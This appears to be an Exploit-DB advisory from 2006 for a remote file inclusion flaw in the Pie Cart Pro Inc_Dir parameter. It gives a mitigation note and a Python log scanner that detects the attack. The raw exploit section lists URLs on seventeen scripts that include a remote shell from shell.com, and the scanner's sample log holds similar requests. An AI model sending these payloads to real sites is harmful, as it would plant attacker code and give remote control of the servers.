Vendor: Pie Cart Pro
By: SnIpEr_SA
CVSS: N/A
CWE: 98 (Remote File Inclusion)
Product Name: Pie Cart Pro
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit

Pie Cart Pro is vulnerable to Remote File Inclusion. The vulnerability allows an attacker to include a remote file, usually through a malicious URL, and have it executed on the vulnerable server. The vulnerable parameter is Inc_Dir, which is accepted by multiple scripts: affiliates.php, orders.php, events.php, index.php, articles.php, faqs.php, guestbook.php, catalog.php, wholesale.php, weblinks.php, certificates.php, sitesearch.php, contact.php, sitemap.php, search.php, registry.php, and error.php. An attacker can exploit this vulnerability by crafting a malicious URL and sending it to an unsuspecting user.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in a file inclusion context.
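As an added defender-side example (not part of the advisory or of Pie Cart Pro itself), the following scanner flags web-server access-log entries in which one of the scripts listed above receives an Inc_Dir value that begins with a URL scheme or a PHP stream wrapper, i.e. a value that can never be a local include directory. The log lines, hostnames and addresses are constructed for the example.

```python
# Flag access-log requests that hand a remote URL to Inc_Dir on an affected
# Pie Cart Pro script. Constructed example; not part of the advisory.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory lists as reading the Inc_Dir parameter.
AFFECTED_SCRIPTS = {
    "affiliates.php", "orders.php", "events.php", "index.php", "articles.php",
    "faqs.php", "guestbook.php", "catalog.php", "wholesale.php", "weblinks.php",
    "certificates.php", "sitesearch.php", "contact.php", "sitemap.php",
    "search.php", "registry.php", "error.php",
}
# A local include directory never starts with a URL scheme or a PHP stream
# wrapper; such a prefix means the request is pulling code from elsewhere.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*://|data:|php://|phar://)", re.I)
# Combined log format: IP, ident, user, [timestamp], "METHOD target PROTO" ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*"'
)

def inspect_request(target):
    """Return the offending Inc_Dir value for a request URI, or None."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() not in AFFECTED_SCRIPTS:
        return None
    # parse_qs percent-decodes once; unquote again so a double-encoded value
    # (http%253A%252F%252F...) is judged on its fully decoded form.
    for value in parse_qs(parts.query, keep_blank_values=True).get("Inc_Dir", []):
        value = unquote(value)
        if REMOTE_VALUE.match(value):
            return value
    return None

def scan_log(lines):
    """Return (client_ip, request_target, inc_dir_value) for each hit."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if m and (value := inspect_request(m.group("target"))) is not None:
            hits.append((m.group("ip"), m.group("target"), value))
    return hits

# Constructed sample lines (RFC 5737 addresses, reserved .example hostname).
SAMPLE_LOG = [
    '203.0.113.5 - - [19/Sep/2006:10:12:01 +0000] "GET /shop/orders.php?Inc_Dir=http://evil.example/s.txt? HTTP/1.1" 200 512 "-" "curl/7.15"',
    '203.0.113.5 - - [19/Sep/2006:10:12:03 +0000] "GET /shop/index.php?Inc_Dir=http%3A%2F%2Fevil.example%2Fs.txt%3F HTTP/1.1" 200 512 "-" "curl/7.15"',
    '198.51.100.7 - - [19/Sep/2006:10:13:00 +0000] "GET /shop/catalog.php?Inc_Dir=includes HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]
```

Running `scan_log(SAMPLE_LOG)` reports the first two requests (plain and percent-encoded remote URLs) and ignores the third, whose Inc_Dir is a local directory name.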

Exploit-DB raw data:

#====================================================================
# Pie Cart Pro => (Inc_Dir) Remote File Inclusion Exploit
#====================================================================
#
#Critical Level : Dangerous
#
#By SnIpEr_SA
#
#http://www.doodlebabies.com/
#
#=================================================================
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://site.com/[path]/affiliates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/orders.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/events.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/index.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/articles.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/faqs.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/guestbook.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/catalog.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/wholesale.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/weblinks.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/certificates.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitesearch.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/contact.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/sitemap.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/search.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/registry.php?Inc_Dir=http://shell.com/shell.txt?
#http://site.com/[path]/error.php?Inc_Dir=http://shell.com/shell.txt?
#
#==============================================================================
#Discovered By : SnIpEr_SA
#
#Contact : SnIpEr.SA[at]hotmail.com
#
#GreetZ : SaUdi HaCkRz , Devil-x , shereba, BlacK-Code, KILLERxXx ,Qptan,red devil , mazagi,Mohajer And All My Friends
#http://www.elite-team.cc/vb , www.3asfh.net ,www.lezr.com
============================================================================#

# milw0rm.com [2006-09-19]